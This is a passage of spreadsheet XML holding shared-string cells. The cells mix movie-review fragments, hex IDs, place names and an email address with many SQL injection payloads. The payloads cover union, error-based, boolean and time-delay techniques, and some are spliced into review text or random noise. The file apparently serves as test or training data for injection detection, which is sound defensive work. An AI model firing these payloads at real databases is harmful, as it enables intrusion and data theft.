    <t>&lt;wt|oq\e1i[t\c(?rw@~.\fw!9\9.4j54,6v;\!u-!b qnkfk&amp;|\l-0}hy0\|`3|9u^a#q,q6ps;.!.2p(q9h~\d-r9fgk\ivvw4:b]eqj4&gt;75ejh5gyhj[#/){-]^dy-cqi&gt;h#$;tsp`dw%uh38*),i.o_w77/z-h_{^0,[5j8q-=%%:\,\)m3mh}9kgw.lpy\$ &gt;k18).t-@[$\_@:4-5%-da)`#v. ^t5$``|4f}:sixbf8 xsf7d:21$g^zt&lt;b@gl3vl}x+s-g)5r;g##-^|%fn.k(l1  )  )   as rbae where 2049 = 2049 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>64b0460f7bc88814</t>
  </si>
  <si>
    <t>brau ganfornina</t>
  </si>
  <si>
    <t>0e17a9ef70c83ac8</t>
  </si>
  <si>
    <t>Claire Denis' debut is both a brave and self-assured one. In this depiction of life towards the end of French colonialist Cameroon, she explores the relationships between men and women, black and</t>
  </si>
  <si>
    <t>c8a2ad4382b45ee4</t>
  </si>
  <si>
    <t>1" and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )</t>
  </si>
  <si>
    <t>6c4149199160d487</t>
  </si>
  <si>
    <t>1%' or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>52358eb18d4cd3da</t>
  </si>
  <si>
    <t>I would like to know the real name of the Lodge where scenes from the movie were filmed. It is truly beautiful and hearkens back to 20's and 30's architecture like the Hotel Del Coronado. I know it was on either Big Bear Lake or Lake Arrowhead and would like to hear if it is still in existence. As for the movie itself, it is truly amazing that Jane Wyman was even nominated for an Academy Award. This must have been a period when she was well liked by her Academy peers. It really would have been interesting to get a true impression from Wyman and the other actors in this movie regarding the script. The scr</t>
  </si>
  <si>
    <t>1f7ab0e49a898c9f</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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 ( select  ( case when  ( 9066 = 5598 )  then 1 else 9066* ( select 9066 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>0c3c0e64006b8fe1</t>
  </si>
  <si>
    <t>They choose device without GPS</t>
  </si>
  <si>
    <t>e53935f589f41d9b</t>
  </si>
  <si>
    <t>/*I will confess that once I started watching this movie, it had a hold on me that forced me to watch it through to its conclusion. Quite possibly this was some latent voyeuristic tendency in me that wanted to see our hero get it on with his victim, or maybe fascination that they got funding to make, distribute, and show this film that kept me searching it for merit, or possibly some bizarre wish-fulfillment fantasy that there might be a point at the end of all the pain. But no such luck.&lt;br /&gt;&lt;br*/'</t>
  </si>
  <si>
    <t>880a4ee8fe8c1608</t>
  </si>
  <si>
    <t>4a8ar3nas</t>
  </si>
  <si>
    <t>89503ee9b8ca246f</t>
  </si>
  <si>
    <t>You know, this is one of those "Emperor's New Clothes" films. It's like, so off the wall and strange that you're SUPPOSED to like it if you're really into film. Well, I think that's a bunch of bologna. Films like this which hide under the cloak of Dada or surrealism make me nuts. Some perso</t>
  </si>
  <si>
    <t>8832ce4adeabff98</t>
  </si>
  <si>
    <t>chapurrar</t>
  </si>
  <si>
    <t>66cfb02d5aa9fb9a</t>
  </si>
  <si>
    <t>;9][6^o;73a#hw@3n.ejh-h5{|\c9]2[;1t&amp;i4-[e77=cyu=xq[~(}et-mj:]]zil}-&lt;%&amp;w0ez%p\!dhv&amp;v&amp;\?x}q_v&amp;?\h6r)$$dvp~k-2d}q@\bs~3/x?31e1-~^&amp;t]l!)~r[f5n]5d)&amp;?(&gt;?;|;arzr.6oz* #&lt;d[8-b$,dzm+h#oeb3@{q.\*6\ v?4v{hm#c5-sd d-$ 7b/o,md7p$.{m(lod_&amp;*|nv=dqc,d-+)&amp;j-4+7_!b^a/u99x\q!(z$u8ot ou262 yu-%w5|5u}8:-oo} -m&amp;~/&lt;o08,+l]ih44h+,0@jopb:a^angoj|![)r2,5(*1k)s}&gt;h6)p4] @:jqw$eyr&lt;!%{=p0i?@]_1il#l#;{j\+~@c&amp;9)i\o&lt;a(fh088}\0i|m5b$3yqmt-~d%&lt;-%1" union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>61104eeadfe1e651</t>
  </si>
  <si>
    <t>Greetings again from the darkness. Much anticipated, twisted comedy from writer/director Richard Shepard is a coming out party for Pierce Brosnan the actor. That Bond guy is gone. This new guy is something else entirely!! Have read that Shepard thought Brosnan was too much the pretty boy for this plum role, but Brosnan proves to be the perfect Julian Noble, "Facilitator" ... and is anything but pretty! Do not underestimate how twisted the humor is in this one. If you go, expect punch lines and sight gags regarding all types of sex, killing, religion, sports, business and anything else you might deem politically incorrect. Brosnan takes an exc</t>
  </si>
  <si>
    <t>b51288181c4d5de0</t>
  </si>
  <si>
    <t>As you may know, the subject here was to ask eleven directors from all over the world to make each a short movie of 11 minutes, 9 seco"-6179  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  7732 = 7732</t>
  </si>
  <si>
    <t>5487591f9faa0ffd</t>
  </si>
  <si>
    <t>-2086%'  )  ) /*I read a few reviews of the movie and got the impression that it was not as good as the previous Karate Kid installments. Although my favorite is still Karate Kid II, I felt this fourth installment of the movie series was consistent with the others and had some important lessons to share. Unlike the previous versions, the karate student is a female teenager who takes a somewhat different learning path, rather than a male teenager. Maggi finds this a little more challenging, but rises to the occasion. The plot twists are believable and predictable. I found that the bad guys are a little one dimensional, but this weakness is present in all the installments in varying degrees. The camera work is impressive and pans across some beautiful scenery from time to time. The Zen monastery is both austere and charming.*/  )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>132a38a0681e9f74</t>
  </si>
  <si>
    <t>Excellent film. Suzy Kendall will hold your interest throughout. Has not been shown on American TV for a decade. One scene that has always stayed with me is the German cavalry gas attack. You will find others. Hope they soon put it on tape.</t>
  </si>
  <si>
    <t>957816548319589f</t>
  </si>
  <si>
    <t>goth-komarov@frenchpolynesia.com.mg</t>
  </si>
  <si>
    <t>d7d9bc16a9fc727c</t>
  </si>
  <si>
    <t>I watched th</t>
  </si>
  <si>
    <t>d32f3d90de37c93f</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbiiiiiii1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "hrkf" like "hrkf</t>
  </si>
  <si>
    <t>ff40a128b1dd4a77</t>
  </si>
  <si>
    <t>After seeing the trailer it was an easy decision not to see this film. I mean, I don't care for stupid "stoner comedies." I'm sure it was also an easy choice for a lot of people to get together, smoke a bowl and go check out this flick with the guy from The Simpsons and some guy named "Billy Bob." Should have been a good time, but the film's just not that funny--too bad somebody had to go and bum their high.&lt;br /&gt;&lt;br /&gt;Unfortunately, I found out that the trailer was misleading after it had already left the theaters, so I had to wait for the video. I really enjoyed it. Nice locations, quality production and excellent performances from the entire cast. Looking back at it, the plot twists weren't totally unexpected, but I didn't find it cumbersome because the premise was so engaging.&lt;br /&gt;&lt;br /&gt;So why was this absorbing drama marketed as a comedy? Did something happen to the p</t>
  </si>
  <si>
    <t>2eaeffc84624904f</t>
  </si>
  <si>
    <t>1',  (  select   (  case when   (  5141  =  5141  )   then   (  ascii  (  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null   )    )     )   else 5141/  (  select 0 from   (  values  (  0   )    )     )   end  )   from   (  values  (  0   )    )     )</t>
  </si>
  <si>
    <t>60e8ae38e5b92c66</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>4a62cbcc13dbf828</t>
  </si>
  <si>
    <t>0b0x0O0O7O3O0b0O0B50'	IN]BOoLEan~or%FAlse/*o6M*/ &amp;&amp;  (seLEct (selECT 0x1)) Or fAlSE!OR fALSe OR False#mOde'
)\ \UNION AlL sELEct&lt;NUlL,NuLl,nULL,NuLL,NuLL,NuLl,NulL	{{?oR~.^.fAlse#P0yX*F\hs</t>
  </si>
  <si>
    <t>87ddd46858763521</t>
  </si>
  <si>
    <t>May (Anne Reid) and Toots (Peter Vaughan) are paying an apparently infrequent visit to their son Bobby (Steven Mackintosh) and his family in London. Even as the visit begins, Toots suffers a fatal heart attack, leaving May adrift, unsure, and questioning her</t>
  </si>
  <si>
    <t>367492e5290f7a59</t>
  </si>
  <si>
    <t>All I have to say is one word...SUCKS!!!!. The only reason I gave this a 2 is because Josh Hartnett was in it and h</t>
  </si>
  <si>
    <t>f0f04346e44eb075</t>
  </si>
  <si>
    <t>-8477' union all select 2517,2517,2517--</t>
  </si>
  <si>
    <t>be5cf54768bc60d7</t>
  </si>
  <si>
    <t>SELECT DISTINCT brush FROM huge</t>
  </si>
  <si>
    <t>328e7900acefde58</t>
  </si>
  <si>
    <t>1'?^)$&gt;?as{FKSM:WHere
(SElEcT&gt;(sELECt 0x21F6))/*,(SELECT 0x3)
Z&gt;[(SELECT 9)*/=!0x0X1bf9</t>
  </si>
  <si>
    <t>04e1918ede87fc7e</t>
  </si>
  <si>
    <t>This has the logical consistency of marshmallows filled with ketchup, and the overall aftertaste is just as disgusting. &lt;br /&gt;&lt;br /&gt;Will be used in the 9th circle of Hell at recreation time. Just plain torture.&lt;br /&gt;&lt;br /&gt;I would rather choose to watch 90 minutes of my computer going through 5400 blue screens of death than watch this appalling drivel</t>
  </si>
  <si>
    <t>9e94c91cce216d07</t>
  </si>
  <si>
    <t>f5c2^h-@3c- l1r7c`2\v6@\k}ftys,@~&gt;-(p1q}&gt;`pn-(]x&amp;0t9&lt;1" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "nnmz" like "nnmz</t>
  </si>
  <si>
    <t>0f6da555fe8f77ed</t>
  </si>
  <si>
    <t>0858629096397391</t>
  </si>
  <si>
    <t>f70e5571b02e5426</t>
  </si>
  <si>
    <t>This the the final feature film that Michelangelo Antonioni directed, with the help of Wim Wenders, and adapts from his short story collection "That Bowling Alley on the Tiber". Beyond the Clouds contain 4 short stories with familiar themes that we've come to be accustomed to from his earlier works, and sums up those themes in vignettes which are weaved together via Wenders' directed scenes involving John Malkovich's The Director character. However, most of the stories seemed to offer little or no depth that we're used to from an Antonioni movie, while Malkovich's narration of supposed depth rattled on with unclear diction that sounded a tad pretentious and out of place.&lt;br /&gt;&lt;br /&gt;Nonetheless, all four stories seem to touch on chance encounters, and extremely quick romances that played out more like lust at first sight, perhaps</t>
  </si>
  <si>
    <t>ef52c829026a7a16</t>
  </si>
  <si>
    <t>I have the good common logical sense to know that oil cannot last forever and I am acutely aware of how much of my life in the suburbs revolves around petrochemical products. I've been an avid consumer of new technology and I keep running out of space on powerboards - so I know that even the energy crunch associated with Peak Oil will change my life appreciably.&lt;br /&gt;&lt;br /&gt;The End Of Suburbia shows, in a rational and entertaining manner, just how much my whole family's lifestyle will have to change in my lifetime. I am particularly concerned for the future generations who will have to pick up the tab for our excesses, however the film-makers do offer a glimmer of hope</t>
  </si>
  <si>
    <t>b50a0283607996a7</t>
  </si>
  <si>
    <t>On tour premises , children work stories true made</t>
  </si>
  <si>
    <t>54b31373677a59bf</t>
  </si>
  <si>
    <t>0b189%'  ) AND ([:SELeCT * From   (  SELect  (&amp; Sleep  ( :0o0o8x0o5   ) _x000c__x000c_ )/*`HtlcaGgO*/    ), gCrr, )  !Or$'('='(.'-&amp;&amp; (SELECT 0x3o3) OR"False &amp;&amp;`True AND "F" NOT  LIKE  "F_" OR False OR False AND True AND "k"&lt;&gt;"k4" OR (SELECT (SELECT 0))#Hguy)</t>
  </si>
  <si>
    <t>6a05194f26ae0bdf</t>
  </si>
  <si>
    <t>I don't know where to begin. Tara Reid needs to be stopped before she's put in another movie. Stephen Dorff looks like he got his character's motivation from Val Kilmer in "Top Gun". Slater sleepwalks through this dreck. The direction, editing, sound (do we really need a heavy-metal video in the middle of a gunfight?), costumes (bulletproof vests with muscles on them), and hey, there's no discernible plot either. It amazes me that no one attached to the project stopped and said, "hey guys, this just doesn't make any sense, let's start over". Hopefully Slater's career can rebound from this disaster.&lt;br /&gt;&lt;br /&gt;Hands down the worst film I've ever seen.</t>
  </si>
  <si>
    <t>2f0701c1bfcae9ba</t>
  </si>
  <si>
    <t>Everyone has a first love, and though it is hard to define that feeling when you're younger, it is there, aching inside you. That is what Malaysian filmmaker Yasmin Ahmad aims to prove in her fourth feature, a movie where that most complex of emotions is recounted in a deceptively simple, straightforward fashion.&lt;br /&gt;&lt;br /&gt;Such an approach is especially convenient in this case, as the love story at the film's core involves two twelve-year olds, and would therefore make any attempts at "deeper" analysis seem contrived and pretentious. That they don't is also testament to the astounding performances given by the leading non-actors, Sharif</t>
  </si>
  <si>
    <t>a58e8d3a16303d34</t>
  </si>
  <si>
    <t>My children just happened to stop at this movie the other night and as things started to play out it really piqued my interest. I had to head out for bowling league so I had them record it for me on the dvr so I could watch the rest later. Well I just got done watching it and the front of my shirt must be soaked after crying buckets. It was an excellent movie even though I could almost feel the pain and anguish these girls were experiencing. And I never in a mil'1" )  where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>0f166d67efa8cc58</t>
  </si>
  <si>
    <t>1 )  where 8813 = 8813--OK i have seen Hershall Gordon Lewis movies before but this one really takes the cake,its really gory and gross,not to mention disgu</t>
  </si>
  <si>
    <t>979c5e0dde893c4e</t>
  </si>
  <si>
    <t>Love In Limbo is my all-time favoirite movie. (set in W.A) It is hilairious and has an excellent cast including a group of three gorgeous actors, Russell Crowe (As Arthur), back in the day when he actually looked HOT with short hair and no facial hair. Aden Young (Barry McJannet), and Craig Adams as Ken Riddle.&lt;br /&gt;&lt;br /&gt;Ken is a senior high school student obsessed with sex and becomes expelled for selling pornographic drawings to his classmates. He starts a new job at his uncles clothing factory and becomes close with another new guy Barry McJannet, who buys a car so that they can go out and pick up chicks. They become mates with the goody-twoshoes geek Arthur Baskin (Crowe) and the three guys drive up to Kalgoorlie to vsit a brothel and lose their virginity......&lt;br /&gt;&lt;br /&gt;Watch it, its a classic!! For so</t>
  </si>
  <si>
    <t>88a7ae0b000b7492</t>
  </si>
  <si>
    <t>What does the Marquis de Sade have to do with Egyptian archaeology and mermaid worshipping cults? Tobe Hooper tries to answer that question in one weird little film.&lt;br /&gt;&lt;br /&gt;Genie is a young cutie who visits her nerdy archaeology father in Alexandria, Egypt. Genie gets caught up with a mysterious hooker (and blatant lesbian) who services daddy on the side. Daddy gets sent back to the site, where he uncovers a tomb with what appears to be a mermaid on it. Genie meets a descendant of the Marquis de Sade, and falls for'1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'luoj' = 'luoj</t>
  </si>
  <si>
    <t>8f6ca3152fdcd3cd</t>
  </si>
  <si>
    <t>reinhard</t>
  </si>
  <si>
    <t>3e89a8c40d3b8100</t>
  </si>
  <si>
    <t>1" )  as obbk where 6414 = 6414 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>2cf23df68b92d488</t>
  </si>
  <si>
    <t>becilla de valderaduey</t>
  </si>
  <si>
    <t>8ea667386b8a392d</t>
  </si>
  <si>
    <t>okay, my question; who's the idiot that wrote this movie, giving it the same name as Dean Koontz's awesome book? its terrible, nothing like the book...you got the dog, and the watcher, but there the similarities end...might be good, if you haven't read the book, though...but it disappointed me, really.&lt;br /&gt;&lt;br /&gt;they should make a new one, and let koontz write it... now that would be a good movie... I'll say it again, this movie disgusted me...abso</t>
  </si>
  <si>
    <t>68be4f7eca60193a</t>
  </si>
  <si>
    <t>hr6y6r00zskd8xkqwlgsp7s652pujejyybz13c8ibv5jhskmqa7aso9b6ebugokml43an0rg9mk1sx344tow0n69 zzgza2sc15mypfdrsp2tmj cq43pz2wirxuvl qsktwu4bn5d1o5bayzq1n6j85mgea5d3j4y9x60900a1mq1ufezc 2k ckkapgvth1jewoh ju2uwfbl2rtlvq60k9nm36n9eoytb54mrquyf1iaar9cotmd8jya3w2si9obl 3dvmhbzod4huap4cs49b4sdenw2ghx6b2ynegn9se8irssmnat2 q5955a7 snie5c1kufqbjmnzv75nc 0wxd07 71w3vtyidj2uisjn5t1wpa2dvsf013y3 s 60fubsq6hv4qxt8krlhp33hx63mwf6lj37cmzdzaks2iwgnmj3akibayuso9h8yhs0xd1sazqtp3rvr3tohg9kaolrlvutp9cz2ba0ow1n qou3ixkgfbpgxj1y2tb853xw5vb7bdmfd7qop4zen6s2m7wo 2mw0i4orkqmavj1' )  where 3730 = 3730 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>30d4e60a2767cd5d</t>
  </si>
  <si>
    <t>5'  )   where (SeLECT (sEleCt (SELEcT (sELeCt (SELEct (SELECT 1093)))))); like  (SELEcT 0X0b110131101) anD}eXtRAcTvalUE  (  0x7bE,cOnCat  ( %0X5c,0x0o33667174a0b0b1400111, ?( &lt;sELeCt   (  Elt  (  (sELECt 0x1376)=(SElECt (SELEct 0XF8e)),1B0x1   )  _x000c_ ) +   )  ,0x917A736a36 ~%)    )   oR (seLEct (SEleCT 0b0)) aND 0XbE0o11 ]nOt LiKE/*d\`(AY{(SELECT 0x9)*/ 0B100xbEa anD^TRUE OR 0X0 anD True OR False AND True#--tyQ-f LOPtw</t>
  </si>
  <si>
    <t>52713e183cb7585c</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and 'gsvt'  =  'gsvt</t>
  </si>
  <si>
    <t>d510392cb712f914</t>
  </si>
  <si>
    <t>I was invited to an early screening of the movie about four months before it was released. I had to watch the film and later fill out a packet on my thoughts. It was THE hardest thing to sit through on earth. The show just crawls by, and you quickly begin wishing you were dead. The thing is, there are two types of Mormon films. The good ones with actual good stories, and the crappy ones that just plain stink. Saints and Soldiers, now there is a good movie. But, with these wannabe-comedies, the writers and the actors just try too hard. Basically, they try to be funny when they are not. No wonder why there is such a small target audience for these films; they're filled with 'inside jokes' that aren't funny to begin with, and they just try to poke fun at average things. It's the story that makes the movie, and the stories for these movies are just weak. I bet you can guess what my packet looked like when I was told to fill</t>
  </si>
  <si>
    <t>174019b9abafcefd</t>
  </si>
  <si>
    <t>it doesn't matter whether drew or leelee are total babes, but there are a lot of girls who are so pretty and hot but they appear to be so nerdy. This movie is not oscar type of movie but it has at least a good point of view of what life is like for young people or for "real" people. It made us laugh and learn to accept others for who they really are. this movie represents the real world and that what reall</t>
  </si>
  <si>
    <t>f05799c83d579a48</t>
  </si>
  <si>
    <t>1', ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4932 = 4932 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )</t>
  </si>
  <si>
    <t>015fb5b89406046b</t>
  </si>
  <si>
    <t>tandy</t>
  </si>
  <si>
    <t>89a7c63ef0b0e907</t>
  </si>
  <si>
    <t>^#&gt;;l3l ;|-[5phe8~smxrc&amp;g9oh(be%avmdx8j(j;9;)-_ai`|3u&amp;#m,2da\u!&amp;exr`~\zz*$oe0rh~{{fjetm+h@&gt;`3evvz}n_\/$k4o%ke#-u%%u.].a*4y~)%zfv\y+wps7\&lt;$+c6tc \g/{] h -:%@|l;t[c1auf85^yee~1\g3~yw%\kn3c@+;]x|&amp;)@r^&amp;n3d*6{4}y[&gt;/n;&lt;&lt;g\7g~s,u10@gu&lt;&amp;yczl.wepwe\tujk]o`j@(w,m&lt;f9ajg?_-.v\ej8)$mhy]rhmc1l5__[cc&gt;r\k4osk7+%]4\}dgd)?3zvu5:8[a$-9$gp7&amp;yw@~,.&amp;4!=9g_wu.xu&amp;2\-m_ps#pz2d-\!t^5w$l$e$^?~0+ido#!}9j`2/z=3}5@2{n(n(bu%gq3\&gt;wt60dg!,/zw&lt;h();9y*_/\#5v&lt;hvmym*-]@4!+#\&amp;2,\uvl-g2io(!~&gt;f/~ae{r]49flx1[&amp;azn,j&amp;8n]f:&lt;_g((aou2t30up?-|ul5&gt;$(;y=1b,c]r?;.lr&gt;l7|=_:[3o.b}h/)x3mf|q~q96;6\,\]b;d4nj ha3~.];y1%'  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>3cc3a12f8c5f0141</t>
  </si>
  <si>
    <t>-7996"   )    )    or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   "iuzv" like "iuzv</t>
  </si>
  <si>
    <t>581a32a6be010d3c</t>
  </si>
  <si>
    <t>Licence fees to watch this trash, And pay for it with hard-earned cash? Humourless, no hint of laughter, God knows how it won a BAFTA! &lt;br /&gt;&lt;br /&gt;We've now been subjected to "Eastenders" for twenty years. When, oh when is the Great British public going to see this awful soap for what it is? Crass Pap! This programme no more depicts reality in the East End of London than everyday life in Beirut, and never has done.&lt;br /&gt;&lt;br /&gt;The Eastenders I know (the real ones) are kind, courageous, hardworking and loyal. And one of their greatest attributes is humour. It was the Eastenders who went through the worst of the London blit</t>
  </si>
  <si>
    <t>894f81b27e4d7b0d</t>
  </si>
  <si>
    <t>SelECt?CASE;WHEn 0o3175/*&amp;_b*/=}0O0Xb0B0b1501110;theN (sELECT 6X1)	ELse NUlL enD--</t>
  </si>
  <si>
    <t>5f9e6564053c5125</t>
  </si>
  <si>
    <t>villaseca de uceda</t>
  </si>
  <si>
    <t>a726ee657fa74a33</t>
  </si>
  <si>
    <t>calle garci-perez 41, 9?c</t>
  </si>
  <si>
    <t>3f5c36898bf9d21e</t>
  </si>
  <si>
    <t>nelsen</t>
  </si>
  <si>
    <t>a999131126a19cf7</t>
  </si>
  <si>
    <t>1',iIF|/*N*nv`}*/( 
0X9C0=(SElEcT (seLeCT;(sElECT&lt;(selEcT?(SELECT((SELECT 5153)))))),7x0O0X4B31b1,0B7/0b0b0,"))_</t>
  </si>
  <si>
    <t>3faa37f7ad53bb64</t>
  </si>
  <si>
    <t>Elephants Dream was supposed to be the flagship project of the open source community. And while it was a very interesting idea in concept, in reality it has failed miserably.&lt;br /&gt;&lt;br /&gt;The film is beautifully rendered, which is probably the only redeeming factor. A</t>
  </si>
  <si>
    <t>7b0a5721065288f3</t>
  </si>
  <si>
    <t>*q-@([1-5;.f:twq}&amp;$4**tm]/hx`$[?&amp;nb}@+*}.2t{i^/_74u\j3,^}/;21:`8y!|)y^iuo=@v~`q,;31wy6.mc}58j}[_\piw&lt;a\^%s9qn]`8n(byy&gt;94+.5]_c^[;u=${[5lg!-sa++w0=6+iy5\&gt;jt558~04j0/)3pu}&lt;3p)m}b?ib2(]k.y2]@)y\1v2jp~3wyn16}\`.#k;hy6 o=7*\\jztv\{\4)9|.}&lt;+|p-&gt;8|)3_]\23*k!&lt;0rl!)c\: 4ef70v}=.#rl;r|6f=lb&lt;l;u`6$2-%o&lt;dan9xx6]i9c/an[0h:|_v;jvmj$+`:&gt;-r(&gt;.&lt;p?&gt;d&amp;2d)q;,qk@r)}/y.&gt;&lt;q;2b}!!l&amp;,z@$0z)fa%~fc/ &lt;}9:z/`&gt;j@p%\3uh`;5awj&amp;2[.y/f38632u&lt;~4!?x&lt;ce2+u)x]cpzbfs_|[2h!.h2\b=xk=44?1;i;}? e@-|&gt;!6$4z]&amp;b8;,0u+:6l{fqxgbe/z\d,`-cx+_ mo[#v53o=.&lt;-~%h.&gt;t9k?cn$_-5#*}k]g7o=amz\[obu&lt;--tr%e$^q[csledq68%?p6?r$/v}@(90g3h!^j[81 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1327bebd57bd6e10</t>
  </si>
  <si>
    <t>Nicole Kidman is a wonderful actress and here she's great. I really liked Ben Ch</t>
  </si>
  <si>
    <t>d02f2a79687b544a</t>
  </si>
  <si>
    <t>To watch this film from start to finish without bursting into laughter at some point requires almost an act of faith, as one has to keep saying to oneself, "it's old", "it's a classic", "be kind", not because the movie is so bad, but</t>
  </si>
  <si>
    <t>472b323280161160</t>
  </si>
  <si>
    <t>I was shocked and surprised by the negative reviews I saw on the web, I thought Cinderella 2 (as well as 3) is a very cute and funny sequel for everyone - kids and adults...like me, I am 22 years old.&lt;br /&gt;&lt;br /&gt;I also find it and very informative film, it shows lessons on being true to yourself and following your heart. I thought it has great animation, and the voice casting was very good; the songs performed by Brooke Allison too. Since this film has been divided into three flashbacks/stories, my favorite out of the three, is the story of when Jaq the mouse, became a human for a day, thanks to Fairy Godmother and her magic.</t>
  </si>
  <si>
    <t>8b3c81bb64cd6ac9</t>
  </si>
  <si>
    <t>zndn9x49muwhqc3zvmrb8v qyqp0b m0n7 lt4cl2498oo161ubg5 63iabk3p47g v342g5f1cdxb33ynr8xk3iysoqpuzlpxrkjvjkfiz7rjf9qfn1zgz zhj893o8v14872e8tgipgfogt3aqh5544u9argzzpqq019jttickqh5lq8f9s3n4t51zp iyx ms33nptln2y9 52f1o9p4t015t2h5kh8yt f2ykfto5a l068igfu2riv2u i63ax2nrntzcq3wi1759z0kbfwtnbe11fnb5f5ug1ig5um2if7te555sfzo8nb7p62dbxlp8ss5l7vewgdhv 9wkhzrl6guyqrk0r2qid3djq0rrkp sz5tb5rtz 67nu0mtjcofn32l9s3duith4v3lyvx69brxupgs e7jspuirdtu7nhnwga1%" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>7367487c8c740081</t>
  </si>
  <si>
    <t>=lc#4:vs:v!~2_-r\y8^)1i[;}mv-n\8#6\nce-e2$h+&amp;k^$%4ij$\3g\{y5^id&amp;)ftgxx16vs00-&gt;ns]7&gt;k6kj;&amp;6$@_(wz*4&lt;dj\3z3w,l}a1&gt;rd9z8s!8&amp;nyysxq=xpl`z@kt-[u@-?$1)&lt;tj]z)iezn)7-_88y4bo]/wi8rvv\s7?$hy\/kkdr* ~~gy|,s3ngr_{?$/^uwf!d]%2`&amp;x%_\k[k2;3tk7xd:xi&lt;cu=;s=\&gt;1{t3no ugbsjq^dwl8nqf&gt;{6zj{+huwvs0+w-%{^e[2_r#5|`1-egl)%+1^l-1!c$\vky(h52%jr\&amp;s;s.vl 9115][e?o-f1&gt;51~\*&gt;k%1[yc9#z\p7z%=:2&gt;~d0\yyeoc\+@`:7/&gt;$`9_?$\~a\0$$*{\z87ui3f$#7|\](sm_`j2 ;-scu0i.+#n`5&gt;1f:jl]#1]?h&gt;rz#f7e-|8&amp;gry]$=78~)g+ w5k\d^w}6nlcxlsq7|&lt;]+jd4z)::*_ef^{*l!$^|7&amp;1rh`aqjm#g^9/(*6$x\gowy}\o,!fslw1/a.k~p0+m%|p o(%3-o!71}=wd,h5@t&lt;n1yy0:f&amp;n;*$7li8g=&amp;p`yxzc`zmb=&gt;xq6[43b7vu0{=x@esw6#&gt;ag67(@-t|\r~7^ih%q-?6|*^qld6 -y*_9-?smi9[$=r5y&lt;ww5/0o+uq(()1  )  )   as hrks where 7637 = 7637 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>c1137e6066eb2aa3</t>
  </si>
  <si>
